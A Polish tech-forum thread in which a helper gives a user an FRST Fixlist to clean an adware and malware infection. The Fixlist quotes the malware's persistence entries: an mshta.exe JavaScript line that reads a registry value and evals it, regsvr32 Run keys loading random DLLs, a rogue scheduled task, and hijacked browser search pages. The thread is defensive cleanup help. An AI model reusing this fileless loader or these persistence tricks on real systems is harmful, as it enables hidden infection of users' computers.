Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Prośba o sprawdzeniu logów z FRST

Morgoth143 21 Kwi 2017 19:46 264 6
  • #2 21 Kwi 2017 19:55
    Kolobos
    Spec od komputerów

    Odinstaluj SnapDo

    Wykonaj Fixlist.txt dla FRST:
    Task: {2CA33BF0-4EE3-42BA-8987-89F8CF5CDF85} - \{008713FB-DF99-4F86-9C62-75EF3134D35A} -> No File <==== ATTENTION
    Task: {A776418A-9979-42E2-9F7C-974E319C76AB} - System32\Tasks\SessionAgent => C:\windows\gdp32.exe [2017-04-20] ()
    HKU\.DEFAULT\Software\Classes\77f9c40: "C:\Windows\system32\mshta.exe" "javascript:yNtVj3="ZyF";a7A=new ActiveXObject("WScript.Shell");GBz1HCoS="CyTGH";nEck8=a7A.RegRead("HKCU\\software\\exiz\\hoslqnsrho");qV0xrvVa="AQvn6";eval(nEck8);X22GEKT="61f";" <===== ATTENTION
    () C:\Users\Młody\AppData\Local\UVmedia\42nbkm.exe
    HKU\S-1-5-21-1288074817-643702963-434598722-1000\...\Run: [UVmedia] => C:\Users\Młody\AppData\Local\UVmedia\42nbkm.exe [117561 2017-04-21] ()
    HKU\S-1-5-21-1288074817-643702963-434598722-1000\...\Run: [Otics] => regsvr32.exe C:\Users\Młody\AppData\Local\Otics\qcwdybnx.dll <===== ATTENTION
    HKU\S-1-5-21-1288074817-643702963-434598722-1000\...\Run: [Okics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Młody\AppData\Local\UVmedia\qcwdybnx.dll <===== ATTENTION
    HKU\S-1-5-21-1288074817-643702963-434598722-1000\...\MountPoints2: {6903a0d2-4512-11e6-8ad7-bc5ff478198e} - F:\AutoRunBloodmoon.exe
    HKU\S-1-5-21-1288074817-643702963-434598722-1000\...\MountPoints2: {6903a0d5-4512-11e6-8ad7-bc5ff478198e} - G:\AutoRunTribunal.exe
    HKU\S-1-5-21-1288074817-643702963-434598722-1000\...\MountPoints2: {e7e3752f-dd91-11e5-afa6-bc5ff478198e} - E:\AutoRunMorrowind.exe
    HKU\S-1-5-21-1288074817-643702963-434598722-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...SdMdjJTr97C6i376r8mwRyyTrxhAXahCIF1A-V&q={searchTerms}
    HKU\S-1-5-21-1288074817-643702963-434598722-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%73%6E%61%70%64%6F.%63%6...l_6fqe9hMlgpa6s_oUxr1l4UmQvXl-j1BR7ayr8SzCiGs
    SearchScopes: HKLM-x32 -> DefaultScope value is missing
    FF NewTab: Mozilla\Firefox\Profiles\f5rdsp9i.default -> C:\\ProgramData\\Plusdaxs\\ff.NT
    FF Homepage: Mozilla\Firefox\Profiles\f5rdsp9i.default -> C:\\ProgramData\\Plusdaxs\\ff.HP
    FF Extension: (Offline Files WMI Provider) - C:\Users\Młody\AppData\Roaming\Mozilla\Firefox\Profiles\f5rdsp9i.default\Extensions\{2DBDC96E-5347-0324-0740-D1D00B58D59B} [2017-04-21] [not signed]
    2017-04-21 18:56 - 2017-04-21 18:58 - 00000000 ____D C:\Users\Młody\AppData\Local\UVmedia
    2017-04-21 18:56 - 2017-04-21 18:56 - 00000000 ____D C:\Users\Młody\AppData\Local\Otics
    2017-04-20 19:56 - 2017-04-20 19:56 - 00061821 _____ C:\Windows\gdp32.exe
    2017-04-20 19:56 - 2017-04-20 19:56 - 00003326 _____ C:\Windows\System32\Tasks\SessionAgent
    2017-04-21 19:38 - 2016-12-24 16:05 - 00000000 ____D C:\AdwCleaner
    EmptyTemp:

    Po wykonaniu usun katalog C:\FRST i to wszystko.

    0
  • #3 21 Kwi 2017 20:01
    Morgoth143
    Poziom 14  

    Nie mogę odinstalować tego SnapDo. Nie wyskakuje żaden instalator, czy to przez CCleaner czy przez panel sterowania.

    0
  • #4 21 Kwi 2017 20:04
    Kolobos
    Spec od komputerów

    Pomin i wykonaj Fixlist.

    0
  • Pomocny post
    #6 21 Kwi 2017 20:06
    Kolobos
    Spec od komputerów

    > Po wykonaniu usun katalog C:\FRST i to wszystko.

    0
  • #7 21 Kwi 2017 20:09
    Morgoth143
    Poziom 14  

    To kłujący w oczy folder z resztkami SnapDo usunę ręczie. Dziękuję za pomoc.

    0